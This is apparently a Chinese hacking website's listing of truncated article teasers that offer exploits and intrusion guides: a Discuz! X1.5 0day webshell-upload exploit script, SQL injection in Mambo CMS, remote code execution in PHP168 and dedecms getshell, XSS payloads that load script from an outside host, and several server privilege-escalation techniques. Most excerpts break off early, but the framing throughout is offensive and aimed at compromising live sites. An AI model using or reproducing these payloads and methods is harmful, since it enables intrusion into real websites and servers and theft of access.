Discuz! X1.5爆0day漏洞 建议升级2.0版本
近日,网络上开始流传一个影响到Discuz! X1.5的0day漏洞,据说利用此漏洞可以上传php木马。建议Discuz! X1.5升级2.0版本。 以下为黑客公布的Discuz! X1.5 0day 利用方法: 把下面内容保存为exp.php 在php环境下运行 php exp.php <?php print_r(' +-------------------...
backtrack常用渗透命令
whois 域名/ip 查看域名的详细信息。 ping 域名/ip 测试本机到远端主机是否联通。 dig 域名/ip 查看域名解析的详细信息。 host -l 域名 dns服务器 传输zone。 查询信息的网站: http://centralops.net http://www.dnsstuff.com http://serversniff.net http://news.netcraft.com...
Mambo CMS 4.6.x (4.6.5) SQL注射缺陷及修复
========================================= Mambo CMS 4.6.x (4.6.5) | SQL Injection ========================================= 1.概述 Mambo CMS 4.6.5及更低版本含注射缺陷 2. 背景 Mambo is a full-featured, award-winning...
77种XSS跨站脚本攻击
1)普通的XSS JavaScript注入 <script type="text/javascript" src="http://webshell.cc/XSS/xss.js"></script> (2)IMG标签XSS使用JavaScript命令 <script type="text/javascript" src="http://webshell.cc/XSS/x...
突破ACL表过滤进行提权
一日从朋友处得到一网站权限,让我帮忙提权。拿到后看了看,C、D盘有只读权限,C:\Documents and Settings\All Users\Documents 可写。 没有装FTP软件和数据库。wscript.shell没有被禁用, 终端端口被改成45678 。试了试从外网连不上45678端口,用LCX也导不出来,本以为是WINDOWS自带的防火墙或者IPSEC。不过防火墙的事拿到系统权限...
渗透底层路由技术 渗透底层路由简化入侵过程
掌握扫描底层路由可以大大方便入侵内网,如企业,公司,学校等等。。若深入透彻技术可以截取敏感信息,简化了入侵过程,而获得路由特权的话,可以制为代理跳板,仿伪攻击等。可以说这是一种"高水平"的黑客技术手段。 首先,我们要准备的东西:"SolarWinds.Engineers.Toolset"。 我们先来打开Cisco Tools里的"IP Network browser"输入我们要扫描的I...
利用navicat提权
navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到 有两个方法提权: . 1、从日志文件里找密码,navicat会把操作日志(比如加账户)保存到C:\My Documents\Navicat\MySQLlogs下的LogHistory.txt,低版本是安装目录下的logs下LogHistory.txt 2、navicat管理的MySQL服务器信息(一般是root帐户)是存在...
PHP168 V6.02 整站系统远程执行任意代码漏洞利用
漏洞出在 inc/function.inc.php 里面 .get_html_url() 这个函数. inc/function.inc.php: function get_html_url(){ global $rsdb,$aid,$fidDB,$webdb,$fid,$page,$showHtml_Type,$Html_Type; $id=$aid; if($page<1){ $page=...
root用户提权之mysql写入启动项提权
实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup" 1、连接到对方MYSQL 服务器 mysql -u r...
dedecms最新0day利用不进后台直接拿WEBSHELL
配合刚暴的织梦不用管理员帐号和密码就能进后台的漏洞 (https://www.webshell.cc/313.html) 拿webshell的方法如下: 网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell. 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1...